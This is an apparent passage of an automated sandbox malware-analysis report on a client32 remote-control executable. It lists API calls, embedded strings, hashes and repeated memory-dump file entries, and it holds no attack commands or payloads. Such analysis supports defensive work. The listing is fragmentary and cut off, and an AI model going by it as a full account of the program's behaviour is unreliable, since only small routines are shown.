                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessagewvsprintf
                                                                                                                                                                                                    • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                                                                                                    • API String ID: 65494530-3330918973
                                                                                                                                                                                                    • Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,00000000,00000100), ref: 11075827
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Coolbar.cpp, xrefs: 11075799
                                                                                                                                                                                                    • iItem >= 0 && iItem < m_iCount, xrefs: 1107579E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$iItem >= 0 && iItem < m_iCount
                                                                                                                                                                                                    • API String ID: 2948472770-4239703120
                                                                                                                                                                                                    • Opcode ID: abd63514fababd9a214bda0e451b90652d8b0dd532cae6cc375061762a272325
                                                                                                                                                                                                    • Instruction ID: 1618788a3872c7e9ead9d95210fd8adda4dd1e4e11fe28ba26c33bee5626ba4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: abd63514fababd9a214bda0e451b90652d8b0dd532cae6cc375061762a272325
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D121F175A00226ABCB10CF68CC81F9A7BA8AF48314F114058FC45AF382EA71F840CBD4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11141496
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                                                                    • Opcode ID: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction ID: d12c9fbe21fce9ebe84299b8ab088ed5ba47cc188f1fd16cec63c381e0116ac0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90213774E043599BDB11CF68CC44BDAF7785B11708F1482D8D69497142DB707688CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 689B2ACB
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689B2B05
                                                                                                                                                                                                      • Part of subcall function 689B2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,689B2AB1), ref: 689B2CFA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$FileHandleNamewsprintf
                                                                                                                                                                                                    • String ID: HTCTL32
                                                                                                                                                                                                    • API String ID: 2676591891-1670862073
                                                                                                                                                                                                    • Opcode ID: e901d1cda71495de8d360f69dd924a551d696c952ecaa199ac087fe769dc27a3
                                                                                                                                                                                                    • Instruction ID: 23e8b857df11c21088341ae3ca3138e29810f909bc974bceaf3815421b72b47a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e901d1cda71495de8d360f69dd924a551d696c952ecaa199ac087fe769dc27a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD216534A042488BDB15DFB49D54BEB3BA8DBAB30CFD04098D84A5F181DB70D942C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(BBC4A55B,00000000,?,BBC4A55B,1118736B,000000FF,?,11066188,NSMWClass,BBC4A55B,?,1106DC18), ref: 110311AA
                                                                                                                                                                                                      • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,BBC4A55B,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                      • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentFreeLoadProcProcessVersion
                                                                                                                                                                                                    • String ID: NSMWClass$NSMWClassVista
                                                                                                                                                                                                    • API String ID: 3451282406-889775840
                                                                                                                                                                                                    • Opcode ID: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
                                                                                                                                                                                                    • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2128c7920c129d5655456ea2413f3e62162671e8cd6b8b3b6cef9dd89fff3e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?), ref: 1113F7BB
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1113F7F5
                                                                                                                                                                                                      • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$FileHandleNamewsprintf
                                                                                                                                                                                                    • String ID: CLIENT32
                                                                                                                                                                                                    • API String ID: 2676591891-3575452709
                                                                                                                                                                                                    • Opcode ID: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
                                                                                                                                                                                                    • Instruction ID: 412e03c58315fe01b93dc4c6e19b7b9e09016b9ccac3efcd19913ad31261d848
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40218B3490126A5BE712DBB48D447EAFFA4DF5231CF0040E9E9D58B245EA705944C7D3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCFEA), ref: 110EB447
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID: Error %d setting %s to %s$nsdevcon64.exe
                                                                                                                                                                                                    • API String ID: 3702945584-4188669160
                                                                                                                                                                                                    • Opcode ID: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction ID: cea032128ce82b3eaf0532e478ffcf8d701adba4055b92399446afe6a01fb2d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401C075A01219AFD700CAA99C89FEAF7ECDB49708F108199F905E7240DA72AE0487A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 1107938E
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11079374
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107936F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: 592da7951c88f8766cb769a5a59c62b899cc8f3ccd205117e395dc582b3b10ac
                                                                                                                                                                                                    • Instruction ID: c3a0bf910db6e25fe1e7fb64db2a563430b1ccec83a3a0d601a616739e002405
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 592da7951c88f8766cb769a5a59c62b899cc8f3ccd205117e395dc582b3b10ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73112175F002299BDB14CF24CD81F9DB3B5AF80318F0085E8E5899B182EB71AD85CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetTimer.USER32(?,00000070,000003E8,00000000), ref: 11077634
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11077617
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077612
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2870079774-2830328467
                                                                                                                                                                                                    • Opcode ID: 1cf2391282d06c5e6dadc8e7658894b1d81bb9ab464a16f1bcbcfe8483c112ac
                                                                                                                                                                                                    • Instruction ID: 0a221c4ce37198b8add36136eb661afe262da32aace6fe12586ef86826e2f239
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf2391282d06c5e6dadc8e7658894b1d81bb9ab464a16f1bcbcfe8483c112ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA116D71A003059FD710CF59C885B4AF7F4FF48358F1086A9EA499B281D7B1E982CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,BBC4A55B,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
